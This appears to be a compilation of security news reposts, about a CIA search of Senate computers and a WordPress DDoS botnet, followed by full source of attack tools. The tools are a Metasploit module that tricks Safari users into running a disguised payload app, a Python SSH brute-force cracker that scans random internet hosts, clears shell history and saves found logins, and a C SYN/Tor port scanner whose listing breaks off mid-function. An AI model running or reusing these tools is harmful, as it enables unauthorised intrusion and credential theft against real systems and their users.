Most of all, Berners-Lee detests the rise of spam email. "It is a waste of the internet's resources and of our time," he says. Looking to the future, Berners-Lee is excited that we have moved from static web pages to pages that can be programmed "like a computer". "It is an extraordinary change," says Berners-Lee. "We are talking about real-time communication between web pages and a new way of < >." Over the next 25 years, Berners-Lee would like to see people in control of where their data is stored. He also wants to make sure the basic infrastructure remains free and unequivocally supports human rights. Via Yahoo! News
-
NSA cheerleader's concern is hypocritical, says Snowden US Senator Dianne Feinstein (D-CA) has issued a rare public rebuke to the CIA after the agency hacked into a Senate committee's computers to remove documents describing agents' torture enhanced interrogation of terrorist suspects. "I have asked for an apology and a recognition that this CIA search of computers used by its oversight committee was inappropriate. I have received neither," she said. "Besides the constitutional implications, the CIA’s search may also have violated the Fourth Amendment, the Computer Fraud and Abuse Act, as well as Executive Order 12333, which prohibits the CIA from conducting domestic searches or surveillance." Feinstein is head of the Senate Intelligence Committee, which is supposed to scrutinize America's intelligence agencies, and has been a strong supporter of the NSA – even sponsoring a bill to codify into law the mass surveillance techniques used by that agency. But it seems when such intrusion happens to her, it's a different matter. Back in 2006, her committee started looking into the CIA's rendition and interrogation program that began in 2002. At some point, agents destroyed video tapes of the interrogation of terrorist suspects, but the then-head of the CIA said this wasn't a problem, since agency documents would give "a more than adequate representation" of what went on. Then in 2009, the agency handed over 6.2 million unsorted documents to the committee's investigators to study. For security reasons, these were held on an air-gapped network in a secure facility, and Senate staffers began the process of going through them, but the amount of data was so immense they asked the CIA for a search tool to go through them. This was provided, and it was used to find a number of interesting reports from an internal CIA review that showed "significant CIA wrongdoing," Feinstein said. But then some of the documents started to disappear form the network. 
Who rm -rf'd the damning dossier? In early 2010 Senate staffers found 870 pages of documents were removed from the database, with another 50 taken out in May. When questioned, the CIA said the documents must have been deleted by IT contractors running the system, then claimed the White House had insisted they be removed, before admitting removing the documents and apologizing to the committee. The committee's report of the CIA's detention and interrogation program was finished last year, and was sent to the White House and the CIA for review. The report used the internal CIA review documents after redacting sensitive information such as the names of CIA staff involved in the program. Then on January 15 Feinstein said CIA director John Brennan called an emergency meeting and told her that his agents had rifled through the computers of congressional staff for documents relating to its internal review of the interrogations. Meanwhile stories were leaked to the press claiming that staffers had hacked CIA computers to get the incriminating documents. Feinstein denied this latter claim, pointing out the documents used were those provided by the CIA itself. She vowed to press on and publish the full report as soon as possible, and called the CIA's actions "a defining moment for the oversight of our Intelligence Community." In an interview on Tuesday the CIA director denied that his agency had done anything wrong. "We weren't trying to block anything," Brennan said. "The matter is being dealt with in an appropriate way, being looked at by the right authorities, and the facts will come out. Let me assure you the CIA was in no way spying on [the committee] or the Senate." Given Feinstein's record, or rather lack of one, in protecting members of the general public from government surveillance, her outraged statement drew wry comment from NSA whistleblower Edward Snowden. 
"It's clear the CIA was trying to play 'keep away' with documents relevant to an investigation by their overseers in Congress, and that's a serious constitutional concern," he said in a statement to NBC News. "But it's equally if not more concerning that we're seeing another 'Merkel Effect,' where an elected official does not care at all that the rights of millions of ordinary citizens are violated by our spies, but suddenly it's a scandal when a politician finds out the same thing happens to them." ® Via CIA hacked Senate PCs to delete torture reports. And Senator Feinstein is outraged • The Register
-
Hackers have hijacked more than 162,000 legitimate WordPress sites, connecting them to a criminal botnet and forcing them to mount distributed denial-of-service (DDoS) attacks, according to security firm Sucuri.

Sucuri CTO Daniel Cid said the company uncovered the botnet when analysing an attack targeting one of its customers. Cid said Sucuri managed to trace the source of the attack to legitimate WordPress sites.

"The most interesting part is that all the requests were coming from valid and legitimate WordPress sites. Yes, other WordPress sites were sending random requests at a very large scale and bringing the site down," read the blog. "Just in the course of a few hours, over 162,000 different and legitimate WordPress sites tried to attack his site. We would likely have detected a lot more sites, but we decided we had seen enough and blocked the requests at the edge firewall, mostly to avoid filling the logs with junk."

Cid said the attackers successfully mounted the scam using a well-known flaw in WordPress code.

"One attacker can use thousands of popular and clean WordPress sites to perform their DDoS attack, while being hidden in the shadows, and that all happens with a simple ping-back request to the XML-RPC file," read the post. "This is a well-known issue within WordPress and the core team is aware of it, it's not something that will be patched, though. In many cases this same issue is categorised as a feature, one that many plugins use, so in there lies the dilemma."

At the time of publishing, WordPress had not responded to V3's request for comment on the Sucuri blog post.

Cid said WordPress users concerned they may be affected should disable the dodgy XML-RPC functionality of their site or download an automated scanner tool from a legitimate security service provider.

Gary Sockrider, solutions architect at DDoS mitigation firm Arbor Networks, told V3 that attacks targeting WordPress users are increasing as the site's lax security makes it easy for hackers. “It’s not uncommon that cyber criminals use PHP web application servers as bots in the attacks. Many WordPress sites, often using the out-of-date TimThumb plugin, were compromised in the past – the same happened to Joomla and other PHP-based applications,” he said. “Attackers usually target unmaintained servers to which the attackers upload PHP web shells and then use those shells to further deploy attack tools. Attackers connect to the tools either directly or through intermediate servers, proxies or scripts.”

DDoS attacks are a growing problem facing governments and businesses. They are a popular tactic with hacktivist groups looking to knock websites and systems offline by flooding them with requests. In 2014 the tactic has been used against numerous high-profile agencies and companies, including the UK Ministry of Justice.

Via Hackers turn 162,000 WordPress sites into DDoS attack tools - IT News from V3.co.uk
-
This Metasploit module abuses some Safari functionality to force the download of a zipped .app OSX application containing our payload. The app is then invoked using a custom URL scheme. At this point, the user is presented with Gatekeeper's prompt: "APP_NAME" is an application downloaded from the internet. Are you sure you want to open it? If the user clicks "Open", the app and its payload are executed. If the user has the "Only allow applications downloaded from Mac App Store and identified developers" setting (on by default on OS 10.8+), the user will see an error dialog containing "can't be opened because it is from an unidentified developer." To work around this issue, you will need to manually build and sign an OSX app containing your payload with a custom URL handler called "openurl". You can put newlines and unicode in your APP_NAME, although you must be careful not to create a prompt that is too tall, or the user will not be able to click the buttons, and will have to either logout or kill the CoreServicesUIAgent process.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserExploitServer

  # Note: might be nicer to do this with mounted FTP share, since we can
  # unmount after the attack and not leave a trace on user's machine.
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Safari User-Assisted Download & Run Attack',
      'Description' => %q{
        This module abuses some Safari functionality to force the download of a
        zipped .app OSX application containing our payload. The app is then
        invoked using a custom URL scheme. At this point, the user is presented
        with Gatekeeper's prompt:

        "APP_NAME" is an application downloaded from the internet. Are you sure
        you want to open it?

        If the user clicks "Open", the app and its payload are executed.

        If the user has the "Only allow applications downloaded from Mac App
        Store and identified developers (on by default on OS 10.8+), the user
        will see an error dialog containing "can't be opened because it is from
        an unidentified developer."

        To work around this issue, you will need to manually build and sign an
        OSX app containing your payload with a custom URL handler called
        "openurl". You can put newlines & unicode in your APP_NAME, although you
        must be careful not to create a prompt that is too tall, or the user
        will not be able to click the buttons, and will have to either logout or
        kill the CoreServicesUIAgent process.
      },
      'License'     => MSF_LICENSE,
      'Targets'     => [
        [ 'Mac OS X x86 (Native Payload)',
          { 'Platform' => 'osx', 'Arch' => ARCH_X86 }
        ],
        [ 'Mac OS X x64 (Native Payload)',
          { 'Platform' => 'osx', 'Arch' => ARCH_X64 }
        ]
      ],
      'DefaultTarget' => 0,
      'Author'      => [ 'joev' ],
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::SAFARI,
        :os_name => OperatingSystems::MAC_OSX,
        # On 10.6.8 (Safari 5.x), a dialog never appears unless the user
        # has already manually launched the dropped exe
        :ua_ver  => lambda { |ver| ver.to_i != 5 }
      }
    ))

    register_options([
      OptString.new('APP_NAME',  [false, "The name of the app to display", "Software Update"]),
      OptInt.new('DELAY',        [false, "Number of milliseconds to wait before trying to open", 2500]),
      OptBool.new('LOOP',        [false, "Continually display prompt until app is run", true]),
      OptInt.new('LOOP_DELAY',   [false, "Time to wait before trying to launch again", 3000]),
      OptBool.new('CONFUSE',     [false, "Pops up a million Terminal prompts to confuse the user", false]),
      OptString.new('CONTENT',   [false, "Content to display in browser", "Redirecting, please wait..."]),
      OptPath.new('SIGNED_APP',  [false, "A signed .app to drop, to workaround OS 10.8+ settings"])
    ], self.class)
  end

  def on_request_exploit(cli, request, profile)
    if request.uri =~ /\.zip/
      print_status("Sending .zip containing app.")
      seed = request.qstring['seed'].to_i
      send_response(cli, app_zip(seed), { 'Content-Type' => 'application/zip' })
    else
      # send initial HTML page
      print_status("Sending #{self.name}")
      send_response_html(cli, generate_html)
    end
    handler(cli)
  end

  def generate_html
    %Q|
      <html><body>
        #{datastore['CONTENT']}
        <iframe id='f' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
        </iframe>
        <iframe id='f2' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
        </iframe>
        <script>
          (function() {
            var r = parseInt(Math.random() * 9999999);
            if (#{datastore['SIGNED_APP'].present?}) r = '';
            var f = document.getElementById('f');
            var f2 = document.getElementById('f2');
            f.src = "#{get_module_resource}/#{datastore['APP_NAME']}.zip?seed="+r;
            window.setTimeout(function(){
              var go = function() { f.src = "openurl"+r+"://a"; };
              go();
              if (#{datastore['LOOP']}) {
                window.setInterval(go, #{datastore['LOOP_DELAY']});
              };
            }, #{datastore['DELAY']});
            if (#{datastore['CONFUSE']}) {
              var w = 0;
              var ivl = window.setInterval(function(){
                f2.src = 'ssh://ssh@ssh';
                if (w++ > 200) clearInterval(ivl);
              }, #{datastore['LOOP_DELAY']});
            }
          })();
        </script>
      </body></html>
    |
  end

  def app_zip(seed)
    if datastore['SIGNED_APP'].present?
      print_status "Zipping custom app bundle..."
      zip = Rex::Zip::Archive.new
      zip.add_r(datastore['SIGNED_APP'])
      zip.pack
    else
      plist_extra = %Q|
        <key>CFBundleURLTypes</key>
        <array>
          <dict>
            <key>CFBundleURLName</key>
            <string>Local File</string>
            <key>CFBundleURLSchemes</key>
            <array>
              <string>openurl#{seed}</string>
            </array>
          </dict>
        </array>
      |
      my_payload = generate_payload_exe(:platform => [Msf::Module::Platform::OSX])
      Msf::Util::EXE.to_osx_app(my_payload,
        :app_name    => datastore['APP_NAME'],
        :plist_extra => plist_extra
      )
    end
  end
end

Safari User-Assisted Download / Run Attack - Packet Storm
-
UPDATE v0.2

# CHANGELOG
# v0.2
# - prints kernel version after login
# - optimized timings when cracking
# - detection for key authentication
# - false positive / small honeypot detection
# - save found target ip addresses to file, -O option
# - 127.x.x.x will be excluded when scanning for random ip addresses
# - unsort found target ip addresses, because of sequential port scanning
# - resolve ip address by given hostname
# - stop attacks on target when keyboard-interactive is required
# - set threads for port scanning, -s option

usage: ./against.py -i <arg> | -r <arg> | -I <arg>

options:
  -i <ip/range>   ip address/ip range/domain (e.g.: 192.168.0-3.1-254)
  -I <file>       list of targets
  -r <num>        attack random hosts
  -p <num>        port number of sshd (default: 22)
  -t <num>        threads per host (default: 4)
  -f <num>        attack max hosts parallel (default: 8)
  -u <username>   single username (default: root)
  -U <file>       list of usernames
  -l <password>   single password (default: toor)
  -L <file>       list of passwords
  -o <file>       write found logins to file
  -O <file>       write found target ip addresses to file
  -s <num>        threads when port scanning (default: 200)
  -T <sec>        timeout in seconds (default: 3)
  -V              print version of against.py and exit

examples:
  attack single target
  usage: ./against.py -i nsa.gov -L passwords.txt

  scanning and attacking an ip-range
  usage: ./against.py -i 192.168.0-10.1-254 -u admin -l troll -s 500

#!/usr/bin/env python
# -*- coding: latin-1 -*-

from socket import *
import multiprocessing
import threading
import time
import paramiko
import sys
import os
import logging
import argparse
import random
import re

# version of against.py
VERSION = 'v0.2'


# print our nice banner
def banner():
    print '--==[ against.py by pgt@nullsecurity.net ]==--'


# print version
def version():
    print '[+] against.py %s' % (VERSION)
    sys.exit(0)


# check if we can write to file
def test_file(filename):
    try:
        outfile = open(filename, 'a')
        outfile.close()
    except IOError:
        print '[!] ERROR: cannot write to file \'%s\'' % filename
        sys.exit(1)


# define command line parameters and help page
def argspage():
    parser = argparse.ArgumentParser(
        usage = '\n\n  ./%(prog)s -i <arg> | -r <arg> | -I <arg>',
        formatter_class = argparse.RawDescriptionHelpFormatter,
        epilog = 'examples:\n\n'
        '  attack single target\n'
        '  usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n'
        '  scanning and attacking an ip-range\n'
        '  usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500',
        add_help = False
    )

    options = parser.add_argument_group('options', '')
    options.add_argument('-i', default=False, metavar='<ip/range>',
            help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)')
    options.add_argument('-I', default=False, metavar='<file>',
            help='list of targets')
    options.add_argument('-r', default=False, metavar='<num>',
            help='attack random hosts')
    options.add_argument('-p', default=22, metavar='<num>',
            help='port number of sshd (default: 22)')
    options.add_argument('-t', default=4, metavar='<num>',
            help='threads per host (default: 4)')
    options.add_argument('-f', default=8, metavar='<num>',
            help='attack max hosts parallel (default: 8)')
    options.add_argument('-u', default='root', metavar='<username>',
            help='single username (default: root)')
    options.add_argument('-U', default=False, metavar='<file>',
            help='list of usernames')
    options.add_argument('-l', default='toor', metavar='<password>',
            help='single password (default: toor)')
    options.add_argument('-L', default=False, metavar='<file>',
            help='list of passwords')
    options.add_argument('-o', default=False, metavar='<file>',
            help='write found logins to file')
    options.add_argument('-O', default=False, metavar='<file>',
            help='write found target ip addresses to file')
    options.add_argument('-s', default=200, metavar='<num>',
            help='threads when port scanning (default: 200)')
    options.add_argument('-T', default=3, metavar='<sec>',
            help='timeout in seconds (default: 3)')
    options.add_argument('-V', action='store_true',
            help='print version of against.py and exit')

    args = parser.parse_args()

    if args.V:
        version()

    if (args.i == False) and (args.I == False) and (args.r == False):
        print ''
        parser.print_help()
        sys.exit(0)

    return args


# write found ip addresses / logins to file
def write_to_file(filename, text):
    outfile = open(filename, 'a')
    outfile.write(text)
    outfile.close()


# connect to target and checks for an open port
def scan(target, port, timeout, oips):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(timeout)
    result = sock.connect_ex((target, port))
    sock.close()

    if result == 0:
        HOSTLIST.append(target)
        if oips:
            write_to_file(oips, target + '\n')


# control the maximum number of threads
def active_threads(threads, waittime):
    while threading.activeCount() > threads:
        time.sleep(waittime)


# create thread and call scan()
def thread_scan(args, target):
    port = int(args.p)
    timeout = float(args.T)
    oips = args.O
    threads = int(args.s)

    bam = threading.Thread(target=scan, args=(target, port, timeout, oips))
    bam.start()
    active_threads(threads, 0.0001)
    time.sleep(0.001)


# only the output when scanning for targets
def scan_output(i):
    sys.stdout.flush()
    sys.stdout.write('\r[*] hosts scanned: {0} | ' \
            'possible to attack: {1}'.format(i, len(HOSTLIST)))


# handle format of given target(s)
def check_targets(targets):
    if re.match(r'^[0-9.\-]*$', targets):
        return targets

    try:
        target = gethostbyname(targets)
        return target
    except gaierror:
        print '[-] \'%s\' is unreachable' % (targets)
        finished()
        sys.exit(1)


# unsort found hosts, because of incremental scanning
def unsort_hostlist():
    print '[*] unsort host list'
    for i in range(15):
        random.shuffle(HOSTLIST)


# handle ip range format from command line
def handle_ip_range(iprange):
    parted = tuple(part for part in iprange.split('.'))
    rsa = range(4)
    rsb = range(4)

    for i in range(4):
        hyphen = parted[i].find('-')
        if hyphen != -1:
            rsa[i] = int(parted[i][:hyphen])
            rsb[i] = int(parted[i][1+hyphen:]) + 1
        else:
            rsa[i] = int(parted[i])
            rsb[i] = int(parted[i]) + 1

    return (rsa, rsb)


# call thread_scan() with target ip addresses
def ip_range(args):
    targets = check_targets(args.i)
    rsa, rsb = handle_ip_range(targets)

    print '[*] scanning %s for ssh services' % targets

    counter = 0
    for i in range(rsa[0], rsb[0]):
        for j in range(rsa[1], rsb[1]):
            for k in range(rsa[2], rsb[2]):
                for l in range(rsa[3], rsb[3]):
                    target = '%d.%d.%d.%d' % (i, j, k, l)
                    counter += 1
                    scan_output(counter)
                    thread_scan(args, target)

    # waiting for the last running threads
    active_threads(1, 0.1)
    scan_output(counter)
    print '\n[*] finished scan'


# create ip addresses
def randip():
    rand = range(4)
    for i in range(4):
        rand[i] = random.randrange(0, 256)

    # exclude 127.x.x.x (retry and return the new address)
    if rand[0] == 127:
        return randip()

    ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3])
    return ipadd


# create random ip addresses
def rand_ip(args):
    i = 0
    print '[*] scanning random ips for ssh services'

    while len(HOSTLIST) < int(args.r):
        i += 1
        scan_output(i)
        thread_scan(args, randip())

    # waiting for the last running threads
    active_threads(1, 1)
    scan_output(i)
    print '\n[*] finished scan.'


# checks if given filename by parameter exists
def file_exists(filename):
    try:
        open(filename).readlines()
    except IOError:
        print '[!] ERROR: cannot open file \'%s\'' % filename
        sys.exit(1)


# read-in a file with ip addresses
def ip_list(ipfile):
    file_exists(ipfile)
    targets = open(ipfile).readlines()
    for target in targets:
        HOSTLIST.append(target)


# connect to target and try to login
def crack(target, port, user, passwd, outfile, timeo, i):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    user = user.replace('\n', '')
    passwd = passwd.replace('\n', '')

    try:
        ssh.connect(target, port=port, username=user, password=passwd,
                timeout=timeo, pkey=None, allow_agent=False)
        time.sleep(3)

        try:
            ssh.exec_command('unset HISTFILE ; unset HISTSIZE')
            time.sleep(1)
            ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \
                    '|| cat /proc/version')
            output = 'kernel: %s' \
                    % (ssh_stdout.readlines()[0].replace('\n', ''))
        except:
            output = 'info: maybe a honeypot or false positive'

        login = '[+] login found for %s | %s:%s\n' \
                '[!] %s' % (target, user, passwd, output)
        print login

        if outfile:
            write_to_file(outfile, login + '\n')

        ssh.close()
        os._exit(0)

    except paramiko.AuthenticationException, e:
        ssh.close()
        exception = str(e)
        if '[\'publickey\']' in exception:
            print '[-] key authentication only - ' \
                    'stopped attack against %s' % (target)
            os._exit(1)
        elif '\'keyboard-interactive\'' in exception:
            print '[-] %s requires \'keyboard-interactive\' handler' % (target)
            os._exit(1)

    except:
        ssh.close()
        # after 3 timeouts per request the attack against $target will be stopped
        if i < 3:
            i += 1
            # reconnect after random seconds (between 0.6 and 1.2 sec)
            randtime = random.uniform(0.6, 1.2)
            time.sleep(randtime)
            crack(target, port, user, passwd, outfile, timeo, i)
        else:
            print '[-] too many timeouts - stopped attack against %s' % (target)
            os._exit(1)


# create 'x' number of threads and call crack()
def thread_it(target, args):
    port = int(args.p)
    user = args.u
    userlist = args.U
    password = args.l
    passlist = args.L
    outfile = args.o
    timeout = float(args.T)
    threads = int(args.t)

    if userlist:
        users = open(userlist).readlines()
    else:
        users = [user]

    if passlist:
        passwords = open(passlist).readlines()
    else:
        passwords = [password]

    # try/except looks dirty but we need it :/
    try:
        for user in users:
            for password in passwords:
                Run = threading.Thread(target=crack, args=(target, port, user,
                    password, outfile, timeout, 0,))
                Run.start()
                # checks that we have a max number of threads
                active_threads(threads, 0.01)
                time.sleep(0.1)

        # waiting for the last running threads
        active_threads(1, 1)

    except KeyboardInterrupt:
        os._exit(1)


# create 'x' child processes (child == cracking routine for only one target)
def fork_it(args):
    threads = int(args.t)
    childs = int(args.f)
    len_hosts = len(HOSTLIST)

    print '[*] attacking %d target(s)\n' \
            '[*] cracking up to %d hosts parallel\n' \
            '[*] threads per host: %d' % (len_hosts, childs, threads)

    i = 1
    for host in HOSTLIST:
        host = host.replace('\n', '')
        print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts)
        hostfork = multiprocessing.Process(target=thread_it, args=(host, args))
        hostfork.start()

        # checks that we have a max number of childs
        while len(multiprocessing.active_children()) >= childs:
            time.sleep(0.001)

        time.sleep(0.001)
        i += 1

    # waiting for child processes
    while multiprocessing.active_children():
        time.sleep(1)


# \(0.o)/
def empty_hostlist():
    if len(HOSTLIST) == 0:
        print '[-] found no targets to attack!'
        finished()
        sys.exit(1)


# output when against.py finished all routines
def finished():
    print '[*] game over!!!'


def main():
    banner()
    args = argspage()

    if args.U:
        file_exists(args.U)
    if args.L:
        file_exists(args.L)
    if args.o:
        test_file(args.o)
    if args.O:
        test_file(args.O)

    if args.i:
        ip_range(args)
        unsort_hostlist()
    elif args.I:
        ip_list(args.I)
    else:
        rand_ip(args)

    time.sleep(0.1)
    empty_hostlist()
    fork_it(args)
    finished()


if __name__ == '__main__':
    HOSTLIST = []
    try:
        logging.disable(logging.CRITICAL)
        main()
    except KeyboardInterrupt:
        print '\nbye bye!!!'
        time.sleep(0.2)
        os._exit(1)

http://www.nullsecurity.net/tools/cracker/against.py
-
Netscan is a TCP and UDP SYN scanner that can also leverage Tor.
Author: Domenico Pinto

gcc -lpthread netscan.c -o netscan

Tcp/Udp/Tor port scanner with: synpacket, connect TCP/UDP and socks5 (tor connection)

./netscan
[*] Network Scanner v1.0 starting at 09:26:50 Mar 9 2014 [*]
 -c | --connect   Tcp protocol
 -s | --syn       Syn packet scanner
 -t | --tor       Tor scanner default 127.0.0.1:9050
 -u | --udp       Udp protocol
 -b | --banner    Parse service banner
 -p | --port      Port method A, A-B, A,B,C,D
 -d | --delay     Delay synpack in ms [min: 50000]
 -v | --verbose   Verbose output
 -h | --help      Print help menu

 Example: scan -s google.it
          scan -c google.it
          scan -t google.it
          scan -c -b google.it
          scan -c -p1-100 google.it
          scan -c -p1,2,3,4 google.it

#include <math.h>
#include <time.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
#include <fcntl.h>
#include <ctype.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <net/if.h>
#include <pthread.h>
#include <termios.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <netinet/in_systm.h>

#define LPORT 1
#define HPORT 65535
#define TCPSZ sizeof(struct iphdr)+sizeof(struct tcphdr)
#define PSESZ sizeof(struct pseudohdr)+sizeof(struct tcphdr)
#define TORPORT 9050
#define TORCTRL 9051
#define LOCALHOST "127.0.0.1"
#define SOCKS5 "\x05\x01\x00"
#define UDP_RESEND 6
#define UDP_PACKET 4096

/* global var */
static int verbose;
static int syn;
static int conn;
static int tor;
static int normal;
static int progress;
static int rangeport;
static int singleport;
static int specificport;
static int udp;
static int webserver;
static int banserv;

unsigned int delay=50000, timeout=1, timeout_s=1, timeout_u=200;
unsigned short min, max, port;
unsigned short index_p=0, index_o=0, index_c=0, index_f=0;
unsigned short ports[HPORT], open_p[HPORT], closed_p[HPORT], filtred_p[HPORT];
char *hostname, *eth0, *ipsource;

typedef enum { false, true } bool;

/* struct tcp syn packet */
struct pseudohdr {
    in_addr_t src;
    in_addr_t dst;
    char padd;
    char proto;
    unsigned short len;
};

/* struct progress bar */
typedef struct {
    char start;
    char end;
    char block;
    char cursor;
    unsigned int width;
    double max;
    bool percent;
    bool update;
} bar;

/* setup char for progress bar */
void setupbar(bar * set)
{
    set->start = '[';
    set->end = ']';
    set->block = '=';
    set->cursor = '>';
    set->percent = true;
    set->update = false;
    set->max = 100;
    set->width = 40;
}

/* Progress bar */
void progressbar(double pos, bar * set)
{
    unsigned int print = (unsigned int)(set->width*pos/set->max);
    unsigned count;

    if(set->update) {
        for(count=set->width+2+(set->percent?5:0); count; count--)
            putchar('\b');
    } else
        set->update = true;

    putchar(set->start);
    count = set->width;
    for(; print>1; print--, count--)
        putchar(set->block);
    putchar((set->max == pos) ? set->block : set->cursor);
    count--;
    for(; count; count--)
        putchar(' ');
    putchar(set->end);
    if(set->percent)
        printf(" %3d%%", (int)(100*pos/set->max));
    fflush(stdout);
}

void help()
{
    //printf("[*] Network Scanner v1.0 helper %s %s\n",__TIME__, __DATE__);
    printf(" -c | --connect\tTcp protocol\n");
    printf(" -s | --syn\t\tSyn packet scanner\n");
    printf(" -t | --tor\t\tTor scanner default 127.0.0.1:9050\n");
    printf(" -u | --udp\t\tUdp protocol\n");
    printf(" -b | --banner\t\tParse service banner\n");
    printf(" -p | --port\t\tPort method A, A-B, A,B,C,D\n");
    printf(" -d | --delay\t\tDelay synpack in ms [min: 50000]\n");
    printf(" -v | --verbose\tVerbose output\n");
    printf(" -h | --help\t\tPrint help menu\n\n");
    printf(" Example: scan -s google.it\n");
    printf("          scan -c google.it\n");
    printf("          scan -t google.it\n");
    printf("          scan -c -b google.it\n");
    printf("          scan -c -p1-100 google.it\n");
    printf("          scan -c -p1,2,3,4 google.it\n");
    exit(0);
}

void ctrlc(int sig)
{
    printf("\n\n CTRL+C intercepted exit scanner\n");
    exit(0);
}

/* error control on port value */
int portcontrol(char *arg)
{
    if(strstr(arg,"-") != NULL) {
        rangeport = 1;
        sscanf(arg, "%hu%*c%hu", &min,&max);
        if(min >= max || min > HPORT-1 || max > HPORT || max == LPORT) {
            printf(" [RANGE-ERROR] invalid port range %s\n\n", arg);
            exit(0);
        }
        return 0;
    }

    if(strstr(arg,",") != NULL) {
        specificport = 1;
        char *p;
        p = strtok(arg, ",");
        while(p != NULL) {
            ports[index_p++] = (unsigned short)atoi(p);
            p = strtok(NULL, ",");
        }
        return 0;
    }

    singleport = 1;
    min = atoi(arg);
    return 0;
}

/* count known services for the selected protocol */
int service()
{
    struct servent *se;
    int i=0;

    if(!udp) {
        while((se = getservent())) {
            if(strcmp(se->s_proto, "tcp") == 0)
                i++;
        }
        return i;
    }

    if(udp) {
        /* udp branch must count udp entries (original compared against "tcp") */
        while((se = getservent())) {
            if(strcmp(se->s_proto, "udp") == 0)
                i++;
        }
        return i;
    }

    return -1;
}

char* resolveHost (char *host)
{
    struct hostent *he;
    struct in_addr a;

    if((he = gethostbyname(host))) {
        while (*he->h_addr_list) {
            bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
            return inet_ntoa(a);
        }
    }
    return 0;
}

int cmpfunc(const void *a, const void *b)
{
    return (*(unsigned short*)a - *(unsigned short*)b);
}

/* remove duplicate */
unsigned short* rmdup(unsigned short *v, int size)
{
    int i,index=0;
    unsigned short *new_v = (unsigned short*)malloc(size*sizeof(unsigned short));

    if (size == 1)
        new_v[0] = v[0];
    else {
        for (i=1; i<size; i++) {
            if (v[i] != v[i-1])
                new_v[index++] = v[i-1];
        }
    }
    return new_v;
}

/* get banner service on open port */
char *bannerservice(unsigned short bport)
{
    int sock, conn, ctra, ctrb, sendbytes, rcvdbytes;
    char banner[1000], *httpdsptr, *httpdbptr, ip_addr[16];
    struct sockaddr_in ban;
    struct hostent *host;
    struct timeval tm;

    tm.tv_sec = 1;
    tm.tv_usec = 0;

    host = gethostbyname(hostname);
    bzero(banner,1000);
    strcpy(ip_addr, (char *)inet_ntoa(*((struct in_addr *)host->h_addr)));

    if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
        return ("N.B. error");
    if(setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&tm, sizeof(struct timeval)) == -1)
        return ("N.B. error");

    ban.sin_family=AF_INET;
    ban.sin_port=htons(bport);
    ban.sin_addr.s_addr=inet_addr(hostname);

    if((conn = connect(sock,(struct sockaddr *)&ban, sizeof(struct sockaddr))) == -1)
        return ("N.B. error");

    /* 19 bytes: "HEAD / HTTP/1.0\r\n\r\n" (CRs were lost in extraction) */
    if(bport == 80)
        sendbytes = send(sock, "HEAD / HTTP/1.0\r\n\r\n", 19, 0);

    rcvdbytes = recv(sock, banner, 1000, 0);

    if(bport == 80) {
        httpdsptr = strstr(banner,"Server");
        for(ctra=0; ctra!=strlen(httpdsptr); ctra++) {
            if(httpdsptr[ctra] == '\n') {
                httpdsptr[ctra] = '\0';
                break;
            }
        }
        httpdbptr = (char *)malloc(ctra-8);
        for(ctrb=0; ctrb!=ctra; ctrb++) {
            httpdbptr[ctrb] = httpdsptr[ctrb+8];
            if(httpdsptr[ctrb+8] == '\0') {
                break;
            }
        }
        printf("[");
        if(strlen(httpdbptr) > 0) {
            httpdbptr[strcspn(httpdbptr,"\r")] = '\0';
            printf("%s", httpdbptr);
        } else
            printf("N.d");
        printf("]");
        fflush(stdout);
    } else {
        printf("[");
        if(strlen(banner) > 0) {
            banner[strcspn(banner,"\r")] = '\0';
            printf("%s", banner);
        } else
            printf("N.d.");
        printf("]");
        fflush(stdout);
    }
    close(sock);
    return 0;
}

/* statistics port status */
int statistic()
{
    struct servent *se;
    unsigned short *new_o,i,total;

    new_o = rmdup(open_p, index_o+1);
    for(i=0; i<index_o; i++);
    total=i;
    qsort(new_o, total, sizeof(unsigned short), cmpfunc);

    if(verbose)
        printf(" ****** STATISTICS ******\n\n");

    for(i=0; i<total; i++) {
        if(new_o[i] == 80)
            webserver = 1;
        if(verbose && !udp)
            printf(" OPEN\t%d", new_o[i]);
        if(verbose && udp)
            printf(" OPEN|filtred\t%d", new_o[i]);
        if(!verbose)
            printf(" OPEN\t%d", new_o[i]);
        if(!udp) {
            if((se = getservbyport(htons(new_o[i]), "tcp")))
                printf("\t%s ", se->s_name);
            else
                printf("\tunknown ");
        }
        if(udp) {
            if((se = getservbyport(htons(new_o[i]), "udp")))
                printf("\t%s\n", se->s_name);
            else
                printf("\tunknown\n");
        }
        if(banserv || (!banserv && new_o[i] == 80)) {
            putchar('\t');
            bannerservice(new_o[i]);
        }
        putchar('\n');
    }

    if(webserver && !banserv) {
        printf("\n[*] Webserver detected: ");
        bannerservice(80);
    }

    if(syn) {
        index_o = i;
        if(normal)
            index_f = 312-index_o-index_c;
        if(rangeport) {
            index_f = (max-min+1)-index_o-index_c;
        }
    }

    if(index_o == 0)
        printf("\n[*] ALL ports are closed.");

